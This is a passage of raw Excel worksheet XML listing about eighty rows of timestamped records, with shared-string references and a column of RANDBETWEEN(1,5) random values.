      <c r="F26328">
        <f t="shared" ca="1" si="411"/>
        <v>1</v>
      </c>
    </row>
    <row r="26329" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26329" s="1">
        <v>42923.764374999999</v>
      </c>
      <c r="C26329" t="s">
        <v>10</v>
      </c>
      <c r="D26329" t="s">
        <v>6</v>
      </c>
      <c r="E26329" t="s">
        <v>23920</v>
      </c>
      <c r="F26329">
        <f t="shared" ca="1" si="411"/>
        <v>3</v>
      </c>
    </row>
    <row r="26330" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26330" s="1">
        <v>42923.653761574074</v>
      </c>
      <c r="C26330" t="s">
        <v>10</v>
      </c>
      <c r="D26330" t="s">
        <v>271</v>
      </c>
      <c r="E26330" t="s">
        <v>23921</v>
      </c>
      <c r="F26330">
        <f t="shared" ca="1" si="411"/>
        <v>1</v>
      </c>
    </row>
    <row r="26331" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26331" s="1">
        <v>42923.642812500002</v>
      </c>
      <c r="C26331" t="s">
        <v>10</v>
      </c>
      <c r="D26331" t="s">
        <v>244</v>
      </c>
      <c r="E26331" t="s">
        <v>23922</v>
      </c>
      <c r="F26331">
        <f t="shared" ca="1" si="411"/>
        <v>2</v>
      </c>
    </row>
    <row r="26332" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26332" s="1">
        <v>42923.640011574076</v>
      </c>
      <c r="C26332" t="s">
        <v>10</v>
      </c>
      <c r="D26332" t="s">
        <v>494</v>
      </c>
      <c r="E26332" t="s">
        <v>23923</v>
      </c>
      <c r="F26332">
        <f t="shared" ca="1" si="411"/>
        <v>1</v>
      </c>
    </row>
    <row r="26333" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26333" s="1">
        <v>42923.627453703702</v>
      </c>
      <c r="C26333" t="s">
        <v>10</v>
      </c>
      <c r="D26333" t="s">
        <v>20</v>
      </c>
      <c r="E26333" t="s">
        <v>23924</v>
      </c>
      <c r="F26333">
        <f t="shared" ca="1" si="411"/>
        <v>4</v>
      </c>
    </row>
    <row r="26334" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A26334" s="1">
        <v>42923.572314814817</v>
      </c>
      <c r="C26334" t="s">
        <v>6</v>
      </c>
      <c r="D26334" t="s">
        <v>25</v>
      </c>
      <c r="E26334" s="2" t="s">
        <v>23925</v>
      </c>
      <c r="F26334">
        <f t="shared" ca="1" si="411"/>
        <v>1</v>
      </c>
    </row>
    <row r="26335" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26335" s="1">
        <v>42923.558067129627</v>
      </c>
      <c r="C26335" t="s">
        <v>10</v>
      </c>
      <c r="D26335" t="s">
        <v>163</v>
      </c>
      <c r="E26335" s="2" t="s">
        <v>23926</v>
      </c>
      <c r="F26335">
        <f t="shared" ca="1" si="411"/>
        <v>1</v>
      </c>
    </row>
    <row r="26336" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A26336" s="1">
        <v>42923.543819444443</v>
      </c>
      <c r="C26336" t="s">
        <v>6</v>
      </c>
      <c r="D26336" t="s">
        <v>25</v>
      </c>
      <c r="E26336" s="2" t="s">
        <v>23927</v>
      </c>
      <c r="F26336">
        <f t="shared" ca="1" si="411"/>
        <v>3</v>
      </c>
    </row>
    <row r="26337" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26337" s="1">
        <v>42923.538726851853</v>
      </c>
      <c r="C26337" t="s">
        <v>721</v>
      </c>
      <c r="E26337" t="s">
        <v>23928</v>
      </c>
      <c r="F26337">
        <f t="shared" ca="1" si="411"/>
        <v>2</v>
      </c>
    </row>
    <row r="26338" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26338" s="1">
        <v>42923.519050925926</v>
      </c>
      <c r="C26338" t="s">
        <v>10</v>
      </c>
      <c r="D26338" t="s">
        <v>494</v>
      </c>
      <c r="E26338" t="s">
        <v>23929</v>
      </c>
      <c r="F26338">
        <f t="shared" ca="1" si="411"/>
        <v>2</v>
      </c>
    </row>
    <row r="26339" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26339" s="1">
        <v>42923.514062499999</v>
      </c>
      <c r="C26339" t="s">
        <v>10</v>
      </c>
      <c r="D26339" t="s">
        <v>41</v>
      </c>
      <c r="E26339" t="s">
        <v>23930</v>
      </c>
      <c r="F26339">
        <f t="shared" ca="1" si="411"/>
        <v>5</v>
      </c>
    </row>
    <row r="26340" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26340" s="1">
        <v>42923.477384259262</v>
      </c>
      <c r="C26340" t="s">
        <v>2187</v>
      </c>
      <c r="E26340" t="s">
        <v>23931</v>
      </c>
      <c r="F26340">
        <f t="shared" ca="1" si="411"/>
        <v>2</v>
      </c>
    </row>
    <row r="26341" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26341" s="1">
        <v>42923.454618055555</v>
      </c>
      <c r="C26341" t="s">
        <v>10</v>
      </c>
      <c r="D26341" t="s">
        <v>17</v>
      </c>
      <c r="E26341" t="s">
        <v>23932</v>
      </c>
      <c r="F26341">
        <f t="shared" ca="1" si="411"/>
        <v>1</v>
      </c>
    </row>
    <row r="26342" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A26342" s="1">
        <v>42923.451608796298</v>
      </c>
      <c r="C26342" t="s">
        <v>6</v>
      </c>
      <c r="D26342" t="s">
        <v>194</v>
      </c>
      <c r="E26342" s="2" t="s">
        <v>23933</v>
      </c>
      <c r="F26342">
        <f t="shared" ca="1" si="411"/>
        <v>1</v>
      </c>
    </row>
    <row r="26343" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26343" s="1">
        <v>42923.427430555559</v>
      </c>
      <c r="C26343" t="s">
        <v>6</v>
      </c>
      <c r="D26343" t="s">
        <v>194</v>
      </c>
      <c r="E26343" t="s">
        <v>23934</v>
      </c>
      <c r="F26343">
        <f t="shared" ca="1" si="411"/>
        <v>2</v>
      </c>
    </row>
    <row r="26344" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26344" s="1">
        <v>42923.4221412037</v>
      </c>
      <c r="C26344" t="s">
        <v>10</v>
      </c>
      <c r="D26344" t="s">
        <v>89</v>
      </c>
      <c r="E26344" t="s">
        <v>23935</v>
      </c>
      <c r="F26344">
        <f t="shared" ca="1" si="411"/>
        <v>5</v>
      </c>
    </row>
    <row r="26345" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26345" s="1">
        <v>42923.397974537038</v>
      </c>
      <c r="C26345" t="s">
        <v>10</v>
      </c>
      <c r="D26345" t="s">
        <v>163</v>
      </c>
      <c r="E26345" t="s">
        <v>23936</v>
      </c>
      <c r="F26345">
        <f t="shared" ca="1" si="411"/>
        <v>5</v>
      </c>
    </row>
    <row r="26346" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26346" s="1">
        <v>42923.355324074073</v>
      </c>
      <c r="C26346" t="s">
        <v>69</v>
      </c>
      <c r="E26346" t="s">
        <v>23937</v>
      </c>
      <c r="F26346">
        <f t="shared" ca="1" si="411"/>
        <v>2</v>
      </c>
    </row>
    <row r="26347" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26347" s="1">
        <v>42923.355127314811</v>
      </c>
      <c r="C26347" t="s">
        <v>10</v>
      </c>
      <c r="D26347" t="s">
        <v>20</v>
      </c>
      <c r="E26347" t="s">
        <v>23938</v>
      </c>
      <c r="F26347">
        <f t="shared" ca="1" si="411"/>
        <v>3</v>
      </c>
    </row>
    <row r="26348" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26348" s="1">
        <v>42923.342361111114</v>
      </c>
      <c r="C26348" t="s">
        <v>559</v>
      </c>
      <c r="E26348" t="s">
        <v>23939</v>
      </c>
      <c r="F26348">
        <f t="shared" ca="1" si="411"/>
        <v>2</v>
      </c>
    </row>
    <row r="26349" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26349" s="1">
        <v>42923.328611111108</v>
      </c>
      <c r="C26349" t="s">
        <v>71</v>
      </c>
      <c r="E26349" s="2" t="s">
        <v>23940</v>
      </c>
      <c r="F26349">
        <f t="shared" ca="1" si="411"/>
        <v>2</v>
      </c>
    </row>
    <row r="26350" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A26350" s="1">
        <v>42923.320972222224</v>
      </c>
      <c r="C26350" t="s">
        <v>124</v>
      </c>
      <c r="E26350" s="2" t="s">
        <v>23941</v>
      </c>
      <c r="F26350">
        <f t="shared" ca="1" si="411"/>
        <v>1</v>
      </c>
    </row>
    <row r="26351" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26351" s="1">
        <v>42923.318101851852</v>
      </c>
      <c r="C26351" t="s">
        <v>907</v>
      </c>
      <c r="E26351" t="s">
        <v>23942</v>
      </c>
      <c r="F26351">
        <f t="shared" ca="1" si="411"/>
        <v>2</v>
      </c>
    </row>
    <row r="26352" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A26352" s="1">
        <v>42923.315046296295</v>
      </c>
      <c r="C26352" t="s">
        <v>41</v>
      </c>
      <c r="E26352" s="2" t="s">
        <v>23943</v>
      </c>
      <c r="F26352">
        <f t="shared" ca="1" si="411"/>
        <v>5</v>
      </c>
    </row>
    <row r="26353" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A26353" s="1">
        <v>42923.290405092594</v>
      </c>
      <c r="C26353" t="s">
        <v>71</v>
      </c>
      <c r="E26353" s="2" t="s">
        <v>23944</v>
      </c>
      <c r="F26353">
        <f t="shared" ca="1" si="411"/>
        <v>2</v>
      </c>
    </row>
    <row r="26354" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A26354" s="1">
        <v>42923.222870370373</v>
      </c>
      <c r="C26354" t="s">
        <v>43</v>
      </c>
      <c r="E26354" s="2" t="s">
        <v>23945</v>
      </c>
      <c r="F26354">
        <f t="shared" ca="1" si="411"/>
        <v>1</v>
      </c>
    </row>
    <row r="26355" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A26355" s="1">
        <v>42923.215925925928</v>
      </c>
      <c r="C26355" t="s">
        <v>50</v>
      </c>
      <c r="E26355" s="2" t="s">
        <v>23946</v>
      </c>
      <c r="F26355">
        <f t="shared" ca="1" si="411"/>
        <v>4</v>
      </c>
    </row>
    <row r="26356" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26356" s="1">
        <v>42923.197500000002</v>
      </c>
      <c r="C26356" t="s">
        <v>189</v>
      </c>
      <c r="E26356" t="s">
        <v>23947</v>
      </c>
      <c r="F26356">
        <f t="shared" ca="1" si="411"/>
        <v>5</v>
      </c>
    </row>
    <row r="26357" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A26357" s="1">
        <v>42923.184837962966</v>
      </c>
      <c r="C26357" t="s">
        <v>65</v>
      </c>
      <c r="E26357" s="2" t="s">
        <v>23948</v>
      </c>
      <c r="F26357">
        <f t="shared" ca="1" si="411"/>
        <v>1</v>
      </c>
    </row>
    <row r="26358" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A26358" s="1">
        <v>42923.124293981484</v>
      </c>
      <c r="C26358" t="s">
        <v>10</v>
      </c>
      <c r="D26358" t="s">
        <v>713</v>
      </c>
      <c r="E26358" s="2" t="s">
        <v>23949</v>
      </c>
      <c r="F26358">
        <f t="shared" ca="1" si="411"/>
        <v>1</v>
      </c>
    </row>
    <row r="26359" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A26359" s="1">
        <v>42923.112569444442</v>
      </c>
      <c r="C26359" t="s">
        <v>71</v>
      </c>
      <c r="E26359" s="2" t="s">
        <v>23950</v>
      </c>
      <c r="F26359">
        <f t="shared" ca="1" si="411"/>
        <v>1</v>
      </c>
    </row>
    <row r="26360" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A26360" s="1">
        <v>42923.058483796296</v>
      </c>
      <c r="C26360" t="s">
        <v>41</v>
      </c>
      <c r="E26360" s="2" t="s">
        <v>23951</v>
      </c>
      <c r="F26360">
        <f t="shared" ca="1" si="411"/>
        <v>2</v>
      </c>
    </row>
    <row r="26361" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26361" s="1">
        <v>42923.045405092591</v>
      </c>
      <c r="C26361" t="s">
        <v>845</v>
      </c>
      <c r="F26361">
        <f t="shared" ca="1" si="411"/>
        <v>1</v>
      </c>
    </row>
    <row r="26362" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26362" s="1">
        <v>42923.045393518521</v>
      </c>
      <c r="C26362" t="s">
        <v>845</v>
      </c>
      <c r="F26362">
        <f t="shared" ca="1" si="411"/>
        <v>1</v>
      </c>
    </row>
    <row r="26363" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26363" s="1">
        <v>42923.022337962961</v>
      </c>
      <c r="C26363" t="s">
        <v>140</v>
      </c>
      <c r="D26363" t="s">
        <v>234</v>
      </c>
      <c r="E26363" s="2" t="s">
        <v>23952</v>
      </c>
      <c r="F26363">
        <f t="shared" ca="1" si="411"/>
        <v>5</v>
      </c>
    </row>
    <row r="26364" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26364" s="1">
        <v>42922.974999999999</v>
      </c>
      <c r="C26364" t="s">
        <v>140</v>
      </c>
      <c r="D26364" t="s">
        <v>46</v>
      </c>
      <c r="E26364" t="s">
        <v>23953</v>
      </c>
      <c r="F26364">
        <f t="shared" ca="1" si="411"/>
        <v>4</v>
      </c>
    </row>
    <row r="26365" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26365" s="1">
        <v>42922.800636574073</v>
      </c>
      <c r="C26365" t="s">
        <v>10</v>
      </c>
      <c r="D26365" t="s">
        <v>6</v>
      </c>
      <c r="E26365" t="s">
        <v>23954</v>
      </c>
      <c r="F26365">
        <f t="shared" ca="1" si="411"/>
        <v>1</v>
      </c>
    </row>
    <row r="26366" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26366" s="1">
        <v>42922.798692129632</v>
      </c>
      <c r="C26366" t="s">
        <v>10</v>
      </c>
      <c r="D26366" t="s">
        <v>11</v>
      </c>
      <c r="E26366" t="s">
        <v>23955</v>
      </c>
      <c r="F26366">
        <f t="shared" ca="1" si="411"/>
        <v>2</v>
      </c>
    </row>
    <row r="26367" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A26367" s="1">
        <v>42922.779120370367</v>
      </c>
      <c r="C26367" t="s">
        <v>10</v>
      </c>
      <c r="D26367" t="s">
        <v>89</v>
      </c>
      <c r="E26367" s="2" t="s">
        <v>23956</v>
      </c>
      <c r="F26367">
        <f t="shared" ca="1" si="411"/>
        <v>2</v>
      </c>
    </row>
    <row r="26368" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A26368" s="1">
        <v>42922.765960648147</v>
      </c>
      <c r="C26368" t="s">
        <v>10</v>
      </c>
      <c r="D26368" t="s">
        <v>46</v>
      </c>
      <c r="E26368" s="2" t="s">
        <v>23957</v>
      </c>
      <c r="F26368">
        <f t="shared" ca="1" si="411"/>
        <v>1</v>
      </c>
    </row>
    <row r="26369" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26369" s="1">
        <v>42922.723298611112</v>
      </c>
      <c r="C26369" t="s">
        <v>10</v>
      </c>
      <c r="E26369" s="2" t="s">
        <v>23958</v>
      </c>
      <c r="F26369">
        <f t="shared" ca="1" si="411"/>
        <v>3</v>
      </c>
    </row>
    <row r="26370" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26370" s="1">
        <v>42922.715833333335</v>
      </c>
      <c r="C26370" t="s">
        <v>6</v>
      </c>
      <c r="D26370" t="s">
        <v>25</v>
      </c>
      <c r="E26370" t="s">
        <v>23959</v>
      </c>
      <c r="F26370">
        <f t="shared" ref="F26370:F26433" ca="1" si="412">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="26371" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26371" s="1">
        <v>42922.656990740739</v>
      </c>
      <c r="C26371" t="s">
        <v>10</v>
      </c>
      <c r="D26371" t="s">
        <v>36</v>
      </c>
      <c r="E26371" s="2" t="s">
        <v>23960</v>
      </c>
      <c r="F26371">
        <f t="shared" ca="1" si="412"/>
        <v>2</v>
      </c>
    </row>
    <row r="26372" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26372" s="1">
        <v>42922.643819444442</v>
      </c>
      <c r="C26372" t="s">
        <v>10</v>
      </c>
      <c r="D26372" t="s">
        <v>36</v>
      </c>
      <c r="E26372" t="s">
        <v>23961</v>
      </c>
      <c r="F26372">
        <f t="shared" ca="1" si="412"/>
        <v>3</v>
      </c>
    </row>
    <row r="26373" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26373" s="1">
        <v>42922.6250462963</v>
      </c>
      <c r="C26373" t="s">
        <v>10</v>
      </c>
      <c r="D26373" t="s">
        <v>52</v>
      </c>
      <c r="E26373" s="2" t="s">
        <v>23962</v>
      </c>
      <c r="F26373">
        <f t="shared" ca="1" si="412"/>
        <v>5</v>
      </c>
    </row>
    <row r="26374" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26374" s="1">
        <v>42922.613715277781</v>
      </c>
      <c r="C26374" t="s">
        <v>10</v>
      </c>
      <c r="D26374" t="s">
        <v>52</v>
      </c>
      <c r="E26374" t="s">
        <v>23963</v>
      </c>
      <c r="F26374">
        <f t="shared" ca="1" si="412"/>
        <v>2</v>
      </c>
    </row>
    <row r="26375" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26375" s="1">
        <v>42922.60056712963</v>
      </c>
      <c r="C26375" t="s">
        <v>10</v>
      </c>
      <c r="D26375" t="s">
        <v>6</v>
      </c>
      <c r="E26375" s="2" t="s">
        <v>23964</v>
      </c>
      <c r="F26375">
        <f t="shared" ca="1" si="412"/>
        <v>2</v>
      </c>
    </row>
    <row r="26376" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26376" s="1">
        <v>42922.541875000003</v>
      </c>
      <c r="C26376" t="s">
        <v>73</v>
      </c>
      <c r="E26376" t="s">
        <v>23965</v>
      </c>
      <c r="F26376">
        <f t="shared" ca="1" si="412"/>
        <v>4</v>
      </c>
    </row>
    <row r="26377" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A26377" s="1">
        <v>42922.509953703702</v>
      </c>
      <c r="C26377" t="s">
        <v>48</v>
      </c>
      <c r="E26377" s="2" t="s">
        <v>23966</v>
      </c>
      <c r="F26377">
        <f t="shared" ca="1" si="412"/>
        <v>2</v>
      </c>
    </row>
    <row r="26378" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26378" s="1">
        <v>42922.496469907404</v>
      </c>
      <c r="C26378" t="s">
        <v>10</v>
      </c>
      <c r="D26378" t="s">
        <v>330</v>
      </c>
      <c r="E26378" t="s">
        <v>23967</v>
      </c>
      <c r="F26378">
        <f t="shared" ca="1" si="412"/>
        <v>3</v>
      </c>
    </row>
    <row r="26379" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26379" s="1">
        <v>42922.488530092596</v>
      </c>
      <c r="C26379" t="s">
        <v>10</v>
      </c>
      <c r="D26379" t="s">
        <v>381</v>
      </c>
      <c r="E26379" t="s">
        <v>23968</v>
      </c>
      <c r="F26379">
        <f t="shared" ca="1" si="412"/>
        <v>1</v>
      </c>
    </row>
    <row r="26380" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26380" s="1">
        <v>42922.485069444447</v>
      </c>
      <c r="C26380" t="s">
        <v>10</v>
      </c>
      <c r="D26380" t="s">
        <v>17</v>
      </c>
      <c r="E26380" t="s">
        <v>23969</v>
      </c>
      <c r="F26380">
        <f t="shared" ca="1" si="412"/>
        <v>5</v>
      </c>
    </row>
    <row r="26381" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A26381" s="1">
        <v>42922.455023148148</v>
      </c>
      <c r="C26381" t="s">
        <v>10</v>
      </c>
      <c r="D26381" t="s">
        <v>244</v>
      </c>
      <c r="E26381" s="2" t="s">
        <v>23970</v>
      </c>
      <c r="F26381">
        <f t="shared" ca="1" si="412"/>
        <v>5</v>
      </c>
    </row>
    <row r="26382" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26382" s="1">
        <v>42922.421435185184</v>
      </c>
      <c r="C26382" t="s">
        <v>48</v>
      </c>
      <c r="E26382" t="s">
        <v>23971</v>
      </c>
      <c r="F26382">
        <f t="shared" ca="1" si="412"/>
        <v>2</v>
      </c>
    </row>
    <row r="26383" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A26383" s="1">
        <v>42922.411226851851</v>
      </c>
      <c r="C26383" t="s">
        <v>48</v>
      </c>
      <c r="E26383" s="2" t="s">
        <v>23972</v>
      </c>
      <c r="F26383">
        <f t="shared" ca="1" si="412"/>
        <v>2</v>
      </c>
    </row>
    <row r="26384" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A26384" s="1">
        <v>42922.341354166667</v>
      </c>
      <c r="C26384" t="s">
        <v>10</v>
      </c>
      <c r="D26384" t="s">
        <v>374</v>
      </c>
      <c r="E26384" s="2" t="s">
        <v>23973</v>
      </c>
      <c r="F26384">
        <f t="shared" ca="1" si="412"/>
        <v>1</v>
      </c>
    </row>
    <row r="26385" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A26385" s="1">
        <v>42922.276122685187</v>
      </c>
      <c r="C26385" t="s">
        <v>318</v>
      </c>
      <c r="E26385" s="2" t="s">
        <v>23974</v>
      </c>
      <c r="F26385">
        <f t="shared" ca="1" si="412"/>
        <v>3</v>
      </c>
    </row>
    <row r="26386" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A26386" s="1">
        <v>42922.226539351854</v>
      </c>
      <c r="C26386" t="s">
        <v>1408</v>
      </c>
      <c r="E26386" s="2" t="s">
        <v>23975</v>
      </c>
      <c r="F26386">
        <f t="shared" ca="1" si="412"/>
        <v>5</v>
      </c>
    </row>
    <row r="26387" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26387" s="1">
        <v>42922.226504629631</v>
      </c>
      <c r="C26387" t="s">
        <v>41</v>
      </c>
      <c r="E26387" t="s">
        <v>23976</v>
      </c>
      <c r="F26387">
        <f t="shared" ca="1" si="412"/>
        <v>2</v>
      </c>
    </row>
    <row r="26388" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26388" s="1">
        <v>42922.202569444446</v>
      </c>
      <c r="C26388" t="s">
        <v>41</v>
      </c>
      <c r="D26388" t="s">
        <v>312</v>
      </c>
      <c r="E26388" t="s">
        <v>23977</v>
      </c>
      <c r="F26388">
        <f t="shared" ca="1" si="412"/>
        <v>3</v>
      </c>
    </row>
    <row r="26389" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A26389" s="1">
        <v>42922.202326388891</v>
      </c>
      <c r="C26389" t="s">
        <v>71</v>
      </c>
      <c r="E26389" s="2" t="s">
        <v>23978</v>
      </c>
      <c r="F26389">
        <f t="shared" ca="1" si="412"/>
        <v>1</v>
      </c>
    </row>
    <row r="26390" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26390" s="1">
        <v>42922.18172453704</v>
      </c>
      <c r="C26390" t="s">
        <v>140</v>
      </c>
      <c r="D26390" t="s">
        <v>46</v>
      </c>
      <c r="E26390" t="s">
        <v>23979</v>
      </c>
      <c r="F26390">
        <f t="shared" ca="1" si="412"/>
        <v>2</v>
      </c>
    </row>
    <row r="26391" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26391" s="1">
        <v>42922.168935185182</v>
      </c>
      <c r="C26391" t="s">
        <v>41</v>
      </c>
      <c r="E26391" t="s">
        <v>23980</v>
      </c>
      <c r="F26391">
        <f t="shared" ca="1" si="412"/>
        <v>4</v>
      </c>
    </row>
    <row r="26392" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26392" s="1">
        <v>42922.139513888891</v>
      </c>
      <c r="C26392" t="s">
        <v>17</v>
      </c>
      <c r="E26392" t="s">
        <v>23981</v>
      </c>
      <c r="F26392">
        <f t="shared" ca="1" si="412"/>
        <v>1</v>
      </c>
    </row>
    <row r="26393" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A26393" s="1">
        <v>42922.079942129632</v>
      </c>
      <c r="C26393" t="s">
        <v>71</v>
      </c>
      <c r="E26393" s="2" t="s">
        <v>23982</v>
      </c>
      <c r="F26393">
        <f t="shared" ca="1" si="412"/>
        <v>4</v>
      </c>
    </row>
    <row r="26394" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A26394" s="1">
        <v>42922.074594907404</v>
      </c>
      <c r="C26394" t="s">
        <v>1050</v>
      </c>
      <c r="E26394" s="2" t="s">
        <v>23983</v>
      </c>
      <c r="F26394">
        <f t="shared" ca="1" si="412"/>
        <v>1</v>
      </c>
    </row>
    <row r="26395" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A26395" s="1">
        <v>42922.05133101852</v>
      </c>
      <c r="C26395" t="s">
        <v>319</v>
      </c>
      <c r="E26395" s="2" t="s">
        <v>23984</v>
      </c>
      <c r="F26395">
        <f t="shared" ca="1" si="412"/>
        <v>5</v>
      </c>
    </row>
    <row r="26396" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A26396" s="1">
        <v>42921.90148148148</v>
      </c>
      <c r="C26396" t="s">
        <v>140</v>
      </c>
      <c r="D26396" t="s">
        <v>847</v>
      </c>
      <c r="E26396" s="2" t="s">
        <v>23985</v>
      </c>
      <c r="F26396">
        <f t="shared" ca="1" si="412"/>
        <v>2</v>
      </c>
    </row>
    <row r="26397" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A26397" s="1">
        <v>42921.90148148148</v>
      </c>
      <c r="C26397" t="s">
        <v>140</v>
      </c>
      <c r="D26397" t="s">
        <v>847</v>
      </c>
      <c r="E26397" s="2" t="s">
        <v>23985</v>
      </c>
      <c r="F26397">
        <f t="shared" ca="1" si="412"/>
        <v>2</v>
      </c>
    </row>
    <row r="26398" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26398" s="1">
        <v>42921.799317129633</v>
      </c>
      <c r="C26398" t="s">
        <v>10</v>
      </c>
      <c r="D26398" t="s">
        <v>94</v>
      </c>
      <c r="E26398" t="s">
        <v>23986</v>
      </c>
      <c r="F26398">
        <f t="shared" ca="1" si="412"/>
        <v>2</v>
      </c>
    </row>
    <row r="26399" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26399" s="1">
        <v>42921.765868055554</v>
      </c>
      <c r="C26399" t="s">
        <v>10</v>
      </c>
      <c r="D26399" t="s">
        <v>6</v>
      </c>
      <c r="E26399" t="s">
        <v>23987</v>
      </c>
      <c r="F26399">
        <f t="shared" ca="1" si="412"/>
        <v>1</v>
      </c>
    </row>
    <row r="26400" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A26400" s="1">
        <v>42921.755416666667</v>
      </c>
      <c r="C26400" t="s">
        <v>144</v>
      </c>
      <c r="E26400" s="2" t="s">
        <v>23988</v>
      </c>
      <c r="F26400">
        <f t="shared" ca="1" si="412"/>
        <v>3</v>
      </c>
    </row>
    <row r="26401" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A26401" s="1">
        <v>42921.734351851854</v>
      </c>
      <c r="C26401" t="s">
        <v>10</v>
      </c>
      <c r="D26401" t="s">
        <v>17</v>
      </c>
      <c r="E26401" s="2" t="s">
        <v>23989</v>
      </c>
      <c r="F26401">
        <f t="shared" ca="1" si="412"/>
        <v>5</v>
      </c>
    </row>
    <row r="26402" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A26402" s="1">
        <v>42921.712199074071</v>
      </c>
      <c r="C26402" t="s">
        <v>260</v>
      </c>
      <c r="E26402" s="2" t="s">
        <v>23990</v>
      </c>
      <c r="F26402">
        <f t="shared" ca="1" si="412"/>
        <v>2</v>
      </c>
    </row>
    <row r="26403" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A26403" s="1">
        <v>42921.706226851849</v>
      </c>
      <c r="C26403" t="s">
        <v>6</v>
      </c>
      <c r="D26403" t="s">
        <v>25</v>
      </c>
      <c r="E26403" s="2" t="s">
        <v>23991</v>
      </c>
      <c r="F26403">
        <f t="shared" ca="1" si="412"/>
        <v>2</v>
      </c>
    </row>
    <row r="26404" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26404" s="1">
        <v>42921.657152777778</v>
      </c>
      <c r="C26404" t="s">
        <v>10</v>
      </c>
      <c r="D26404" t="s">
        <v>80</v>
      </c>
      <c r="E26404" t="s">
        <v>23992</v>
      </c>
      <c r="F26404">
        <f t="shared" ca="1" si="412"/>
        <v>5</v>
      </c>
    </row>
    <row r="26405" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A26405" s="1">
        <v>42921.652662037035</v>
      </c>
      <c r="C26405" t="s">
        <v>260</v>
      </c>
      <c r="E26405" s="2" t="s">
        <v>23993</v>
      </c>
      <c r="F26405">
        <f t="shared" ca="1" si="412"/>
        <v>2</v>
      </c>
    </row>
    <row r="26406" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26406" s="1">
        <v>42921.638749999998</v>
      </c>
      <c r="C26406" t="s">
        <v>10</v>
      </c>
      <c r="D26406" t="s">
        <v>163</v>
      </c>
      <c r="E26406" t="s">
        <v>23994</v>
      </c>
      <c r="F26406">
        <f t="shared" ca="1" si="412"/>
        <v>5</v>
      </c>
    </row>
    <row r="26407" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A26407" s="1">
